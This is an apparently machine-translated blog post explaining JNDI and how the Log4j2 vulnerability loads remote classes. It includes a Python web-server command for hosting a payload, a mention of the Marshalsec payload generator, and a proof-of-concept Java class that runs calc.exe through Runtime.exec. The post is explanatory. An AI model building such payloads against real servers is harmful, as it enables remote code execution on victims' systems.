Original: Taste of Little Sister (wechat official ID: XjjDog), welcome to share, please reserve the source.

JNDI seems to be around for every big bug. Recently, the Log4j2 vulnerability is also related to it, which makes people wonder if the author opened a back door.

Because JNDI is something a lot of people have never even heard of, let alone used. Why put something so cool and sour in a journaling frame? I’m afraid only the author makes sense.

Database driver

Many people start with JNDI as a database driver. Of course, with the popularity of SpringBoot singleton publishing, fewer and fewer antique companies are now using this method to obtain database configurations.

For example, we can configure a tomcat server. XML file called

<Resource name="jdbc/xjjdogDB" auth="Container" type="javax.sql.DataSource"
maxTotal="100" maxIdle="30" maxWaitMillis="10000"
username="xjjdog" password="123456" driverClassName="com.mysql.jdbc.Driver"
url="jdbc:mysql://localhost:3306/xjjdog_db"/>
Copy the code

So, we just need to configure the JNDI name in SpringBoot and it will load the correct configuration. The premise is that we need to package the SpringBoot service as a WAR package for distribution. Software like JBoss, which claims to be an enterprise server, likes to do just that.

spring:
  datasource:
	jndi-name: jdbc/xjjdogDB
Copy the code

And here we can see that. What the hell is JNDI? You can think of it either as a configuration center or as a naming service. Its basic function is that you can retrieve a series of complex configuration and initialization functions from a short string.

This way, we can avoid writing these configurations directly into the project. What is loaded when the program starts depends on what is configured in the running environment.

A HashMap that retrieves a value based on a key.

This is where the danger comes in

The point is this value, it’s not a String, it’s an Object. To go from a string to a normal class, and to be generic, you have to rely on reflection.

This diagram is an official introduction to JNDI from Oracle. None of the above is the point. JNDI can interact with LDAP, RMI and other technologies through the SPI mechanism.

Any convenience that goes against the rules for convenience creates problems. SPI is one of the few technologies that breaks the Java class loading mechanism, and like the Unsafe class, it is powerful but not as recommended.

Pictured above, is the NamingManager getObjectFactoryFromReference class methods. When it loads the corresponding class locally, if it doesn’t, it does something it shouldn’t but has to do, which is construct the corresponding object from the code on the network!

This way, you can show off your muscles and have a good time. As shown above, we only need to start one nginx on port 8000. Or just start a small Web server using Python.

python -m http.server 8000
Copy the code

A server that can initiate an extranet request will automatically load the invalid class file from the specified server.

It’s also very easy to create these offensive playloads, with tools like Marshalsec that can be easily generated.

According to Java’s classloading mechanism, inside the static code block, you can do some actual code execution logic. We just put the compiled A.class in its place and JNDI stuff loads it.

public class a {
    static {
        try {
            String[] cmd = {"calc.exe"};
   java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch( Exception e ) { e.printStackTrace(); }}}Copy the code

The above code will start a CALC calculator on your deployed server. Of course, it could do more.

END

As you can see above, Java reflection is powerful, but also dangerous. The SPI function inherits this feature and boldly exposes its weaknesses. I think the functionality is great, but why should it exist in the logging framework?

It’s probably because of the roll. After all, a journaling framework should also have the dream of a meta-universe!

Xjjdog is a public account that doesn’t allow programmers to get sidetracked. Focus on infrastructure and Linux. Ten years architecture, ten billion daily flow, and you discuss the world of high concurrency, give you a different taste. My personal wechat xjjdog0, welcome to add friends, further communication.